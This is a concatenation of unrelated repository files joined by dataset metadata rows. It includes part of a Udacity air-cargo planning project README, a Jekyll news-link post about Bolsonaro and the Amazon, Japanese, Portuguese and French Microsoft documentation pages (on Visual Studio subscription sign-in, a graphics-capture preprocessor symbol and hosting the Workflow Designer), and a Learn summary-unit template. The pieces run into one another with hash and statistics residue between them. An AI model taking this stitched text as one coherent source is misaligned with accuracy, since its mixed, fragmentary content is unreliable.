* Run uninformed planning searches for `air_cargo_p1`, `air_cargo_p2`, and `air_cargo_p3`; provide metrics on number of node expansions required, number of goal tests, time elapsed, and optimality of solution for each search algorithm. Include the result of at least three of these searches, including breadth-first and depth-first, in your write-up (`breadth_first_search` and `depth_first_graph_search`).
* If depth-first takes longer than 10 minutes for Problem 3 on your system, stop the search and provide this information in your report.
* Use the `run_search` script for your data collection: from the command line type `python run_search.py -h` to learn more.
>#### Why are we setting the problems up this way?
>Progression planning problems can be
solved with graph searches such as breadth-first, depth-first, and A*, where the
nodes of the graph are "states" and edges are "actions". A "state" is the logical
conjunction of all boolean ground "fluents", or state variables, that are possible
for the problem using Propositional Logic. For example, we might have a problem to
plan the transport of one cargo, C1, on a
single available plane, P1, from one airport to another, SFO to JFK.

In this simple example, there are five fluents, or state variables, which means our state
space could be as large as 2^5 = 32. Note the following:
>- While the initial state defines every fluent explicitly, in this case mapped to **TTFFF**, the goal may
be a set of states. Any state that is `True` for the fluent `At(C1,JFK)` meets the goal.
>- Even though PDDL uses variable to describe actions as "action schema", these problems
are not solved with First Order Logic. They are solved with Propositional logic and must
therefore be defined with concrete (non-variable) actions
and literal (non-variable) fluents in state descriptions.
>- The fluents here are mapped to a simple string representing the boolean value of each fluent
in the system, e.g. **TTFFTT...TTF**. This will be the state representation in
the `AirCargoProblem` class and is compatible with the `Node` and `Problem`
classes, and the search methods in the AIMA library. A minimal sketch of this string representation follows below.
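The sketch below is illustrative only; the fluent ordering and the helper function are assumptions for the one-cargo, one-plane example above, not part of the provided skeleton:

```python
# Ordered fluents for the one-cargo, one-plane example above
fluents = ['At(C1, SFO)', 'At(P1, SFO)', 'In(C1, P1)', 'At(C1, JFK)', 'At(P1, JFK)']

# Initial state from the figure: C1 and P1 at SFO, everything else false -> "TTFFF"
initial_state = 'TTFFF'

def is_goal(state: str, goal_fluents: list) -> bool:
    """A state satisfies the goal if every goal fluent maps to 'T'."""
    return all(state[fluents.index(f)] == 'T' for f in goal_fluents)

# Any state with At(C1, JFK) true meets the goal, e.g. "FFFTT"
print(is_goal('FFFTT', ['At(C1, JFK)']))  # True
```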
### Part 2 - Domain-independent heuristics
#### READ: Stuart Russel and Peter Norvig text
"Artificial Intelligence: A Modern Approach" 3rd edition chapter 10 *or* 2nd edition Chapter 11 on Planning, available [on the AIMA book site](http://aima.cs.berkeley.edu/2nd-ed/newchap11.pdf) section:
- *Planning Graph*
#### TODO: Implement heuristic method in `my_air_cargo_problems.py`
- `AirCargoProblem.h_ignore_preconditions` method
#### TODO: Implement a Planning Graph with automatic heuristics in `my_planning_graph.py`
- `PlanningGraph.add_action_level` method
- `PlanningGraph.add_literal_level` method
- `PlanningGraph.inconsistent_effects_mutex` method
- `PlanningGraph.interference_mutex` method
- `PlanningGraph.competing_needs_mutex` method
- `PlanningGraph.negation_mutex` method
- `PlanningGraph.inconsistent_support_mutex` method
- `PlanningGraph.h_levelsum` method
#### TODO: Experiment and document: metrics of A* searches with these heuristics
* Run A* planning searches using the heuristics you have implemented on `air_cargo_p1`, `air_cargo_p2` and `air_cargo_p3`. Provide metrics on number of node expansions required, number of goal tests, time elapsed, and optimality of solution for each search algorithm and include the results in your report.
* Use the `run_search` script for this purpose: from the command line type `python run_search.py -h` to learn more.
>#### Why a Planning Graph?
>The planning graph is somewhat complex, but is useful in planning because it is a polynomial-size approximation of the exponential tree that represents all possible paths. The planning graph can be used to provide automated admissible heuristics for any domain. It can also be used as the first step in implementing GRAPHPLAN, a direct planning algorithm that you may wish to learn more about on your own (but we will not address it here).
>*Planning Graph example from the AIMA book*
>
### Part 3: Written Analysis
#### TODO: Include the following in your written analysis.
- Provide an optimal plan for Problems 1, 2, and 3.
- Compare and contrast non-heuristic search result metrics (optimality, time elapsed, number of node expansions) for Problems 1,2, and 3. Include breadth-first, depth-first, and at least one other uninformed non-heuristic search in your comparison; Your third choice of non-heuristic search may be skipped for Problem 3 if it takes longer than 10 minutes to run, but a note in this case should be included.
- Compare and contrast heuristic search result metrics using A* with the "ignore preconditions" and "level-sum" heuristics for Problems 1, 2, and 3.
- What was the best heuristic used in these problems? Was it better than non-heuristic search planning methods for all problems? Why or why not?
- Provide tables or other visual aids as needed for clarity in your discussion.
## Examples and Testing:
- The planning problem for the "Have Cake and Eat it Too" problem in the book has been
implemented in the `example_have_cake` module as an example.
- The `tests` directory includes `unittest` test cases to evaluate your implementations. All tests should pass before you submit your project for review. From the AIND-Planning directory command line:
- `python -m unittest tests.test_my_air_cargo_problems`
- `python -m unittest tests.test_my_planning_graph`
- You can run all the test cases with additional context by running `python -m unittest -v`
- The `run_search` script is provided for gathering metrics for various search methods on any or all of the problems and should be used for this purpose.
## Submission
Before submitting your solution to a reviewer, you are required to submit your project to Udacity's Project Assistant, which will provide some initial feedback.
The setup is simple. If you have not installed the client tool already, then you may do so with the command `pip install udacity-pa`.
To submit your code to the project assistant, run `udacity submit` from within the top-level directory of this project. You will be prompted for a username and password. If you login using google or facebook, visit [this link](https://project-assistant.udacity.com/auth_tokens/jwt_login) for alternate login instructions.
This process will create a zipfile in your top-level directory named cargo_planning-<id>.zip. This is the file that you should submit to the Udacity reviews system.
## Improving Execution Time
The exercises in this project can take a *long* time to run (from several seconds to a several hours) depending on the heuristics and search algorithms you choose, as well as the efficiency of your own code. (You may want to stop and profile your code if runtimes stretch past a few minutes.) One option to improve execution time is to try installing and using [pypy3](http://pypy.org/download.html) -- a python JIT, which can accelerate execution time substantially. Using pypy is *not* required (and thus not officially supported) -- an efficient solution to this project runs in very reasonable time on modest hardware -- but working with pypy may allow students to explore more sophisticated problems than the examples included in the project.
"# AIND-Planning"
| 61.430168 | 749 | 0.758912 | eng_Latn | 0.991963 |
e04281f7c73eae3572466921d75e45bbec43bfa4 | 815 | md | Markdown | _posts/2019-04-09-bolsonaro-quer-explorar-amazonia-com-os-estados-unidos.md | tatudoquei/tatudoquei.github.io | a3a3c362424fda626d7d0ce2d9f4bead6580631c | [
"MIT"
] | null | null | null | _posts/2019-04-09-bolsonaro-quer-explorar-amazonia-com-os-estados-unidos.md | tatudoquei/tatudoquei.github.io | a3a3c362424fda626d7d0ce2d9f4bead6580631c | [
"MIT"
] | null | null | null | _posts/2019-04-09-bolsonaro-quer-explorar-amazonia-com-os-estados-unidos.md | tatudoquei/tatudoquei.github.io | a3a3c362424fda626d7d0ce2d9f4bead6580631c | [
"MIT"
] | 1 | 2022-01-13T07:57:24.000Z | 2022-01-13T07:57:24.000Z | ---
layout: post
item_id: 2553623443
title: >-
Bolsonaro quer explorar Amazônia com os Estados Unidos
author: Tatu D'Oquei
date: 2019-04-09 00:41:38
pub_date: 2019-04-09 00:41:38
time_added: 2019-06-27 06:44:06
category:
tags: []
image: http://p2.trrsf.com/image/fget/cf/800/450/middle/images.terra.com/2019/04/09/47980904354.jpg
---
In an interview with a radio station, the president says he proposed a partnership with Donald Trump to explore the region. Bolsonaro also promises to review the demarcation of indigenous lands.
**Link:** [https://www.terra.com.br/noticias/brasil/bolsonaro-quer-explorar-amazonia-com-os-estados-unidos,0fe3cd0344bfef7a8d290ca3d469b34c2j51h46h.html](https://www.terra.com.br/noticias/brasil/bolsonaro-quer-explorar-amazonia-com-os-estados-unidos,0fe3cd0344bfef7a8d290ca3d469b34c2j51h46h.html)
| 42.894737 | 296 | 0.792638 | por_Latn | 0.667117 |
e04518c16f3b45462d7acd19a7ef4daa2bcf0748 | 5,068 | md | Markdown | subscriptions/sign-in-issues.md | MicrosoftDocs/visualstudio-docs.ja-jp | 9e5d2448fa132240e5e896f8587952d491569739 | [
"CC-BY-4.0",
"MIT"
] | 21 | 2018-01-02T00:40:26.000Z | 2021-11-27T22:41:23.000Z | subscriptions/sign-in-issues.md | MicrosoftDocs/visualstudio-docs.ja-jp | 9e5d2448fa132240e5e896f8587952d491569739 | [
"CC-BY-4.0",
"MIT"
] | 1,784 | 2018-02-14T20:18:58.000Z | 2021-10-02T07:23:46.000Z | subscriptions/sign-in-issues.md | MicrosoftDocs/visualstudio-docs.ja-jp | 9e5d2448fa132240e5e896f8587952d491569739 | [
"CC-BY-4.0",
"MIT"
] | 53 | 2017-12-13T07:35:40.000Z | 2021-11-24T05:45:59.000Z | ---
title: Issues signing in to Visual Studio subscriptions | Microsoft Docs
author: evanwindom
ms.author: cabuschl
manager: cabuschl
ms.assetid: 176c7f11-b19d-49e9-a6dd-b2e5da5e8480
ms.date: 10/13/2021
ms.topic: conceptual
description: Learn about issues you may encounter when signing in to your Visual Studio subscriptions
ms.openlocfilehash: 2613a80eb6439e9ce152ad1ba23098e1ffb92209
ms.sourcegitcommit: 72f8ce4992cc62c4833e6dcb0f79febb328c44be
ms.translationtype: HT
ms.contentlocale: ja-JP
ms.lasthandoff: 10/14/2021
ms.locfileid: "130011381"
---
# <a name="issues-signing-in-to-visual-studio-subscriptions"></a>Visual Studio サブスクリプションへのサインインに関する問題
Visual Studio サブスクリプションを使用するには、最初にサインインする必要があります。 サブスクリプションによっては、Microsoft アカウント (MSA) または Azure Active Directory (Azure AD) ID を使用してセットアップされている場合があります。 この記事では、サブスクリプションにサインインするときに発生する可能性がある問題について説明します。
## <a name="microsoft-accounts-msa-cannot-be-created-using-workschool-email-addresses"></a>職場/学校のメール アドレスを使用して Microsoft アカウント (MSA) を作成することはできない
職場/学校のメール アドレスを使用して新しい個人用 Microsoft アカウント (MSA) を作成することは、メール ドメインが Azure AD で構成されているときは許可されません。 これはどういう意味でしょうか。 Microsoft 365 または Azure AD に依存する他の Microsoft 提供ビジネス サービスが組織で使用されていて、Azure AD テナントにドメイン名を追加している場合、ユーザーはドメインのメール アドレスを使って新しい個人用 Microsoft アカウントを作成できなくなります。
### <a name="why-was-this-change-made"></a>この変更が行われた理由
職場のアドレスをユーザー名として使って個人用 Microsoft アカウントを作成することは、エンド ユーザーにとっても IT 部門にとっても問題があることです。 次に例を示します。
- ユーザーは、自分の個人用 Microsoft アカウントがビジネスに準拠していて、自分の OneDrive にビジネス ドキュメントを保存してもポリシーを遵守していると考える可能性があります
- 組織を離れたユーザーは、通常、職場のメール アドレスにアクセスできなくなります。 そうなったとき、自分のパスワードを忘れた場合、自分の個人用 Microsoft アカウントに戻れなくなる場合があります。 逆に、IT 部門は該当者のパスワードをリセットして、退職した従業員の個人用アカウントに入ることができます。
- IT 部門は、アカウントの所有権とセキュリティに関して誤った認識を持っています。 しかし、ユーザーは、職場のメール アドレスにコードを 1 回ラウンドトリップするだけで、後でいつでも自分のアカウント名を変更できます。
そのような状況は、同じメール アドレスで 2 つのアカウント (Azure AD と Microsoft アカウント) を持っているユーザーの場合、特に混乱を招きます。
### <a name="what-does-this-experience-look-like"></a>この場合に表示されるエクスペリエンス
職場または学校のメール アドレスで Microsoft のコンシューマー アプリにサインアップしようとすると、次のようなメッセージが表示されます。
> [!div class="mx-imgBorder"]
> 
On the other hand, if you try to sign up for a Microsoft app that supports both personal and work/school accounts, you will see a message like this:
> [!div class="mx-imgBorder"]
> 
### <a name="are-existing-accounts-affected"></a>既存のアカウントへの影響
ここで説明したサインアップのブロックでは、新しいアカウントの作成だけが禁止されます。 職場/学校のメール アドレスで既に Microsoft アカウントを持っているユーザーには影響ありません。 既にそのような状況になっている場合、個人用 Microsoft アカウントの名前を簡単に変更できるようになっています。 簡単なステップ バイ ステップ ガイダンスが、こちらの[サポート記事](https://windows.microsoft.com/en-US/Windows/rename-personal-microsoft-account)で提供されています。 個人用 Microsoft アカウントの名前の変更とはユーザー名を変更することを意味し、職場のメールや、Microsoft 365 などのビジネス サービスへのサインイン方法には影響ありません。 また、個人情報にも影響しません。サインイン方法が変わるだけです。 別の (個人用) メール アドレスを使用したり、新しい @outlook.com メール アドレスを Microsoft から取得したり、自分の電話番号を新しいユーザー名として使用したりすることができます。
> [!NOTE]
> If your IT department asked you to create a personal Microsoft account with your work/school email address in order to access Microsoft business services such as Premier Support, talk to your management team before renaming the account.
## <a name="deleting-a-sign-in-address-may-prevent-access-to-a-subscription"></a>サインイン アドレスを削除するとサブスクリプションにアクセスできなくなる可能性がある
サブスクリプションに関連付けられている ID (MSA または AAD) を削除した場合、ユーザー名とサインイン ID を含むサブスクライバー情報が匿名になり、サブスクリプションにアクセスできなくなる可能性があります。
サブスクリプションへのアクセスが影響を受けないようにするには、次のいずれかの方法を使用します。
- 両方の ID 管理システムではなく、どちらか一方 (MSA または AAD) だけを配置します。
- テナントを介して、AAD と MSA の ID を関連付けます。
## <a name="signing-in-may-fail-when-using-aliases"></a>エイリアスを使用するとサインインに失敗することがある
サインインに使用されるアカウントの種類によっては、[https://my.visualstudio.com](https://my.visualstudio.com?wt.mc_id=o~msft~docs) にサインインするときに利用可能なサブスクリプションが正しく表示されない場合があります。 考えられる原因の 1 つは、サブスクリプションが割り当てられているサインイン ID の代わりに "別名" または "表示名" を使用していることです。 これは "別名定義" と呼ばれます。
### <a name="what-is-aliasing"></a>別名定義とは
"別名定義" という用語は、Windows (または Active Directory) へのサインインと電子メールへのアクセスに別々の ID を持っているユーザーを指します。
別名定義は、[email protected] のように、会社が自社のディレクトリのサインイン用に Microsoft オンライン サービスを持っているが、ユーザーは [email protected] などの別名や表示名を使用して自分の電子メール アカウントにアクセスしている場合に発生する場合があります。 ボリューム ライセンス サービス センター (VLSC) を介してサブスクリプションを管理している多くのユーザーにとって、これがサインインが失敗する原因となる場合があります。指定したメール アドレス ([email protected]) が、"職場または学校アカウント" オプションを通じて正常に認証するために必要なディレクトリ アドレス ([email protected]) と一致していないからです。
### <a name="what-options-do-i-have"></a>どのようなオプションがありますか
サブスクライバーの観点からは、まず、管理者に問い合わせて、会社の ID の構成を理解することが重要です。 必要に応じて、管理者が管理ポータルから、サブスクライバーのアカウント設定を更新する必要がある場合や、サブスクライバーが自分の会社のメール アドレスを使用して Microsoft アカウント (MSA) を作成する必要がある場合があります。 MSA を作成する手順を実行する前に、この実行に関するポリシーまたは問題について管理者と話します。
## <a name="resources"></a>リソース
- Visual Studio サブスクリプションの販売、サブスクリプション、アカウント、課金のサポートについては、Visual Studio [サブスクリプション サポート](https://aka.ms/vssubscriberhelp)をご覧ください。
## <a name="see-also"></a>関連項目
- [Visual Studio ドキュメント](/visualstudio/)
- [Azure DevOps ドキュメント](/azure/devops/)
- [Azure ドキュメント](/azure/)
- [Microsoft 365 ドキュメント](/microsoft-365/)
## <a name="next-steps"></a>次のステップ
- AAD 内で [MSA アカウントと AAD アカウントをリンクする](/azure/active-directory/b2b/add-users-administrator)方法を学習します。
- [匿名化](anonymization.md)について詳しく学習します。 | 65.818182 | 516 | 0.825375 | jpn_Jpan | 0.756561 |
e045572620e9c64e4972a3bf8c46267b8632516d | 1,058 | md | Markdown | README.md | AbihaFatima/Hire-HELP | c174656497d5018ea219061259532b4adfad8543 | [
"MIT"
] | 1 | 2020-09-21T10:30:40.000Z | 2020-09-21T10:30:40.000Z | README.md | AbihaFatima/Hire-HELP | c174656497d5018ea219061259532b4adfad8543 | [
"MIT"
] | null | null | null | README.md | AbihaFatima/Hire-HELP | c174656497d5018ea219061259532b4adfad8543 | [
"MIT"
] | 2 | 2020-10-01T11:25:45.000Z | 2020-10-02T16:08:57.000Z | # Hire-HELP
> One-stop solution to find all kinds of blue-collar laborers 👷 and workers near you. 🌄 A way to minimize a major issue prevalent in our society, i.e., unemployment. Made with 💖 using ExpressJS. ✔
## Run Locally
### 1.Clone repository
```sh
$ git clone https://github.com/SpectreX-AHM/Hire-HELP.git
$ cd hire-help
```
### 2.Install MongoDB
Download it from here: https://docs.mongodb.com/manual/administration/install-community/
Create your own collection and add that in mongoose.connect(). We have used cloud MongoDB Atlas for this project.
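For reference, the connection call could look roughly like the snippet below; the environment variable name and options shown are assumptions, not the project's actual code:
```js
// app.js - connect to your own MongoDB Atlas cluster
mongoose.connect(process.env.MONGODB_URI, {
  useNewUrlParser: true,
  useUnifiedTopology: true
});
```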
### 3.Run Backend
```sh
$ npm install
$ npm start
```
### 4.Run app on localhost 3000
Create an app.listen function in app.js and run the app on https://localhost:3000
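A minimal version of that call could look like the following; the log message is just a placeholder, not the project's actual code:
```js
// app.js - start the Express server on port 3000
app.listen(3000, () => {
  console.log("Hire-HELP running on http://localhost:3000");
});
```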
### 5.Api keys
Make sure to add your own API keys for Cloudinary and SendGrid under API_KEY
### Map feature works on data of United States
Add the details of cities in cities.js file
### Check out the deployed version 🤘
https://hire-help.herokuapp.com/
## License
MIT © [SpectreX-AHM](https://github.com/SpectreX-AHM) 😊
| 27.128205 | 193 | 0.725898 | eng_Latn | 0.911722 |
e04636ac9df9d7aa74e773ec08fe4079bd45f07f | 2,292 | md | Markdown | docs/debugger/graphics/dont-save-vsglog-to-temp.md | drigovz/visualstudio-docs.pt-br | 7a1b53ff3dd5c3151e9c8b855599edf499df9d95 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/debugger/graphics/dont-save-vsglog-to-temp.md | drigovz/visualstudio-docs.pt-br | 7a1b53ff3dd5c3151e9c8b855599edf499df9d95 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/debugger/graphics/dont-save-vsglog-to-temp.md | drigovz/visualstudio-docs.pt-br | 7a1b53ff3dd5c3151e9c8b855599edf499df9d95 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: DONT_SAVE_VSGLOG_TO_TEMP | Microsoft Docs
ms.date: 11/04/2016
ms.topic: conceptual
ms.assetid: f27ab0e6-9575-4ca0-9901-37d3e5c3a2f5
author: mikejo5000
ms.author: mikejo
manager: jmartens
ms.workload:
- multiple
ms.openlocfilehash: f94b287f6ed9d4cda0696252ba32d493879ed5c1
ms.sourcegitcommit: ae6d47b09a439cd0e13180f5e89510e3e347fd47
ms.translationtype: MT
ms.contentlocale: pt-BR
ms.lasthandoff: 02/08/2021
ms.locfileid: "99880262"
---
# <a name="dont_save_vsglog_to_temp"></a>DONT_SAVE_VSGLOG_TO_TEMP
Define por sua presença se o arquivo de log de gráficos é salvo no diretório de arquivos temporários do usuário.
## <a name="syntax"></a>Sintaxe
```C++
#define DONT_SAVE_VSGLOG_TO_TEMP
```
## <a name="value"></a>Valor
Um símbolo de pré-processador que, por sua presença ou ausência, determina se o arquivo de log de gráficos é salvo no diretório de arquivos temporários do usuário. Se esse símbolo for definido, o nome do arquivo definido pelo `VSG_DEFAULT_RUN_FILENAME` será relativo ao diretório atual do aplicativo capturado, ou será um caminho absoluto; caso contrário, o nome do arquivo definido pelo `VSG_DEFAULT_RUN_FILENAME` será relativo ao diretório de arquivos temporários do usuário e não poderá ser um caminho absoluto.
## <a name="remarks"></a>Comentários
Dependendo dos privilégios do usuário, o arquivo de log de gráficos pode não ser capaz de ser salvo em um local arbitrário. Recomendamos que você prefira salvar os logs de gráficos no diretório de arquivos temporários do usuário ou em outro local válido, se não tiver certeza se o local escolhido pode ser gravado pelo usuário.
Para impedir que o arquivo de log de elementos gráficos seja salvo no diretório de arquivos temporários, você deve definir `DONT_SAVE_VSGLOG_TO_TEMP` antes de incluir `vsgcapture.h` .
## <a name="example"></a>Exemplo
Este exemplo mostra como salvar o arquivo de log de gráficos em um caminho absoluto no computador host.
```cpp
// Define DONT_SAVE_VSGLOG_TO_TEMP and VSG_DEFAULT_RUN_FILENAME before including vsgcapture.h
#define DONT_SAVE_VSGLOG_TO_TEMP
#define VSG_DEFAULT_RUN_FILENAME L"C:\\Graphics Diagnostics Captures\\default.vsglog"
#include <vsgcapture.h>
```
## <a name="see-also"></a>Confira também
- [VSG_DEFAULT_RUN_FILENAME](vsg-default-run-filename.md)
| 47.75 | 515 | 0.799738 | por_Latn | 0.991699 |
e0465095de4ba7d754e8c38271e6f32205f9dad4 | 86 | md | Markdown | content/en/blog/_index.md | shinnlok/deps.cloud | 1c899df91651c84c46fa785e1c7c53a0b5af07af | [
"MIT"
] | 1 | 2021-08-28T01:44:31.000Z | 2021-08-28T01:44:31.000Z | content/en/blog/_index.md | shinnlok/deps.cloud | 1c899df91651c84c46fa785e1c7c53a0b5af07af | [
"MIT"
] | null | null | null | content/en/blog/_index.md | shinnlok/deps.cloud | 1c899df91651c84c46fa785e1c7c53a0b5af07af | [
"MIT"
] | null | null | null | ---
title: "Blog"
linkTitle: "Blog"
date: 2020-06-12
menu:
main:
weight: 10
---
| 9.555556 | 17 | 0.581395 | eng_Latn | 0.260952 |
e046cd9e442c9e6e16084948107196a9869a3897 | 4,353 | md | Markdown | content-templates/default-summary-unit.md | nickwalkmsft/learn-scaffolding | e9f554857187068025530f3dd0a04c9930df6807 | [
"CC-BY-4.0",
"MIT"
] | 4 | 2021-02-23T21:54:01.000Z | 2022-03-24T10:48:07.000Z | content-templates/default-summary-unit.md | nickwalkmsft/learn-scaffolding | e9f554857187068025530f3dd0a04c9930df6807 | [
"CC-BY-4.0",
"MIT"
] | 11 | 2021-02-19T01:17:40.000Z | 2022-01-10T20:09:34.000Z | content-templates/default-summary-unit.md | nickwalkmsft/learn-scaffolding | e9f554857187068025530f3dd0a04c9930df6807 | [
"CC-BY-4.0",
"MIT"
] | 15 | 2021-01-27T19:17:09.000Z | 2022-03-14T21:45:13.000Z | <!-- 1. Restate the scenario problem --------------------------------------------------------------------------------
Goal: Summarize the challenge(s) posed in the introduction scenario; be brief (1-2 sentences)
Heading: none
Example: "You are writing the instruction manual for a new model fire extinguisher. The instructions must be quickly read and understood by a wide variety of people."
[Summary unit guidance](https://review.docs.microsoft.com/learn-docs/docs/id-guidance-module-summary-unit?branch=master)
-->
TODO: restate the scenario problem
<!-- 2. Show how you solved the scenario problem(s)---------------------------------------------------
Goal: Describe how you used the product to solve the problem(s) posed in the introduction scenario
Heading: none; depending on length, you can put this in a separate paragraph or combine this with the previous section into a single paragraph
Recommended: format this as lead-in sentence(s) followed by a list
Example: "You did some research and found that Plain English is a good writing style for safety-critical communications. You applied several Plain English techniques to your instructions:
* Removed unnecessary words, which made your sentences easier to read even in a stressful situation like a fire.
* Made sure all sentences used the active voice, which made your content more direct.
* Replaced fire-industry jargon with everyday words, which made the instructions accessible to a wider audience.
* Replaced a comma-delimited list with a bulleted list, which made the steps to activate the fire extinguisher easier to follow."
-->
TODO: add your lead-in sentence(s)
TODO: add your list of techniques used to solve the scenario problem
<!-- 3. Describe the experience without the product ---------------------------------------------------
Goal: Describe what would be required to solve the problem without using the product; be brief (1-2 sentences)
Heading: none; typically this will be a new paragraph
Example: "Fire extinguishers are critical safety equipment for both homes and businesses. Despite their importance, many customers don't read the instructions ahead of time. Confusing instructions could mean customers don't use the extinguisher correctly when they're needed. This can result in loss of property or life."
-->
TODO: describe the experience without the product
<!-- 4. Describe the business impact ----------------------------------------------------
Goal: explain the business impact of using the product to solve the problem
Heading: none; depending on length, you can put this in a separate paragraph or combine this with the previous section into a single paragraph
Example: "The test for effective instructions is whether customers can use your extinguishers correctly during an emergency. Users that fail might blame the instructions or the product. In either case, it's not good for business. On the other hand, successful customers are likely to share their stories and become advocates for your product."
-->
TODO: describe the business impact
<!-- 5. References (optional) ----------------------------------------------------
Goal: Provide a few recommendations for further study via a bulleted list of links. This is optional and intended to be used sparingly. - use the target page title as the text for your link
- do not include other text such as a description
- prefer other first-party sites like Docs reference pages
- link to third-party sites only when they are trusted and authoritative
- do not link to other Learn content ("next steps" recommendations are generated automatically)
- avoid linking to opinion sites such as blog posts
Heading: "## References"
Example:
"## References
* [Administrator role permissions in Azure Active Directory](https://docs.microsoft.com/azure/active-directory/users-groups-roles/directory-assign-admin-roles)
* [What is Azure role-based access control (Azure RBAC)?](https://docs.microsoft.com/azure/role-based-access-control/overview)
* [Manage access to billing information for Azure](https://docs.microsoft.com/azure/billing/billing-manage-access)"
-->
<!-- Do not include any other content -->
| 62.185714 | 347 | 0.702963 | eng_Latn | 0.998298 |
e047b18c0a17dee72921bedff10fdd567e81d131 | 6,943 | md | Markdown | docs/framework/windows-workflow-foundation/task-2-host-the-workflow-designer.md | smolck/docs.fr-fr | ee27cca4b8e319e4cbdea9103c3f90ac22378d50 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/windows-workflow-foundation/task-2-host-the-workflow-designer.md | smolck/docs.fr-fr | ee27cca4b8e319e4cbdea9103c3f90ac22378d50 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/windows-workflow-foundation/task-2-host-the-workflow-designer.md | smolck/docs.fr-fr | ee27cca4b8e319e4cbdea9103c3f90ac22378d50 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: 'Tâche 2 : héberger le Workflow Designer'
ms.date: 03/30/2017
ms.assetid: 0a29b138-270d-4846-b78e-2b875e34e501
ms.openlocfilehash: 8e4c17ed182cec7748b9a1f11f76ff90aa60c39e
ms.sourcegitcommit: 5fb5b6520b06d7f5e6131ec2ad854da302a28f2e
ms.translationtype: MT
ms.contentlocale: fr-FR
ms.lasthandoff: 12/03/2019
ms.locfileid: "74715789"
---
# <a name="task-2-host-the-workflow-designer"></a>Tâche 2 : héberger le Workflow Designer
Cette rubrique décrit la procédure d’hébergement d’une instance de Windows Concepteur de flux de travail dans une application Windows Presentation Foundation (WPF).
La procédure configure le contrôle de **grille** qui contient le concepteur, crée par programmation une instance du <xref:System.Activities.Presentation.WorkflowDesigner> qui contient une activité de <xref:System.Activities.Statements.Sequence> par défaut, inscrit les métadonnées du concepteur pour fournir la prise en charge du concepteur pour toutes les activités intégrées et héberge les concepteur de flux de travail dans l’application WPF.
## <a name="to-host-the-workflow-designer"></a>Pour héberger le concepteur de workflow
1. Ouvrez le projet HostingApplication que vous avez créé dans [tâche 1 : créer une application de Windows Presentation Foundation](task-1-create-a-new-wpf-app.md).
2. Ajustez la taille de la fenêtre pour faciliter l’utilisation de la Concepteur de flux de travail. Pour ce faire, sélectionnez **MainWindow** dans le concepteur, appuyez sur F4 pour afficher la fenêtre **Propriétés** , puis, dans la section **disposition** , affectez à la **largeur** la valeur 600 et à la **hauteur** la valeur 350.
3. Définissez le nom de la grille en sélectionnant le panneau **grille** dans le concepteur (cliquez sur la zone à l’intérieur de **MainWindow**) et en définissant la propriété **Name** en haut de la fenêtre **Propriétés** sur « grid1 ».
4. Dans la fenêtre **Propriétés** , cliquez sur le bouton de sélection ( **...** ) en regard de la propriété `ColumnDefinitions` pour ouvrir la boîte de dialogue **éditeur de collections** .
5. Dans la boîte de dialogue **éditeur de collection** , cliquez trois fois sur le bouton **Ajouter** pour insérer trois colonnes dans la mise en page. La première colonne contient la **boîte à outils**, la deuxième héberge la concepteur de flux de travail, et la troisième colonne est utilisée pour l’inspecteur de propriété.
6. Affectez à la propriété `Width` de la colonne Middle la valeur « 4 * ».
7. Cliquez sur **OK** pour enregistrer les modifications. Le code XAML suivant est ajouté à votre fichier *MainWindow. Xaml* :
```xaml
<Grid Name="grid1">
<Grid.ColumnDefinitions>
<ColumnDefinition />
<ColumnDefinition Width="4*" />
<ColumnDefinition />
</Grid.ColumnDefinitions>
</Grid>
```
8. Dans **Explorateur de solutions**, cliquez avec le bouton droit sur *MainWindow. Xaml* et sélectionnez **afficher le code**. Modifiez le code en procédant comme suit :
1. Ajoutez les espaces de noms suivants :
```csharp
using System.Activities;
using System.Activities.Core.Presentation;
using System.Activities.Presentation;
using System.Activities.Presentation.Metadata;
using System.Activities.Presentation.Toolbox;
using System.Activities.Statements;
using System.ComponentModel;
```
2. Pour déclarer un champ de membre privé pour contenir une instance du <xref:System.Activities.Presentation.WorkflowDesigner>, ajoutez le code suivant à la classe `MainWindow` :
```csharp
public partial class MainWindow : Window
{
private WorkflowDesigner wd;
public MainWindow()
{
InitializeComponent();
}
}
```
3. Ajoutez la méthode `AddDesigner` suivante à la classe `MainWindow`. L’implémentation crée une instance du <xref:System.Activities.Presentation.WorkflowDesigner>, y ajoute une activité de <xref:System.Activities.Statements.Sequence> et la place dans la colonne centrale de la **grille**grid1.
```csharp
private void AddDesigner()
{
// Create an instance of WorkflowDesigner class.
this.wd = new WorkflowDesigner();
// Place the designer canvas in the middle column of the grid.
Grid.SetColumn(this.wd.View, 1);
// Load a new Sequence as default.
this.wd.Load(new Sequence());
// Add the designer canvas to the grid.
grid1.Children.Add(this.wd.View);
}
```
4. Pour ajouter la prise en charge du concepteur pour toutes les activités intégrées, enregistrez les métadonnées du concepteur. Cela vous permet de déplacer des activités de la boîte à outils vers l’activité d' <xref:System.Activities.Statements.Sequence> d’origine dans le Concepteur de flux de travail. Pour ce faire, ajoutez la méthode `RegisterMetadata` à la classe `MainWindow` :
```csharp
private void RegisterMetadata()
{
var dm = new DesignerMetadata();
dm.Register();
}
```
Pour plus d’informations sur l’inscription des concepteurs d’activités, consultez [Comment : créer un concepteur d’activités personnalisées](how-to-create-a-custom-activity-designer.md).
5. Dans le constructeur de classes `MainWindow`, ajoutez des appels aux méthodes précédemment déclarées pour enregistrer les métadonnées dans le but de la prise en charge du concepteur et pour créer l'objet <xref:System.Activities.Presentation.WorkflowDesigner>.
```csharp
public MainWindow()
{
InitializeComponent();
// Register the metadata.
RegisterMetadata();
// Add the WFF Designer.
AddDesigner();
}
```
> [!NOTE]
> La méthode `RegisterMetadata` enregistre les métadonnées du concepteur relatives aux activités intégrées, dont l'activité <xref:System.Activities.Statements.Sequence>. Étant donné que la méthode `AddDesigner` utilise l'activité <xref:System.Activities.Statements.Sequence>, la méthode `RegisterMetadata` doit être appelée en premier.
9. Appuyez sur <kbd>F5</kbd> pour générer et exécuter la solution.
10. Consultez [tâche 3 : créer les volets boîte à outils et PropertyGrid](task-3-create-the-toolbox-and-propertygrid-panes.md) pour savoir comment ajouter la prise en charge de la **boîte à outils** et de **PropertyGrid** à votre concepteur de workflow réhébergé.
## <a name="see-also"></a>Voir aussi
- [Réhébergement du concepteur de flux de travail](rehosting-the-workflow-designer.md)
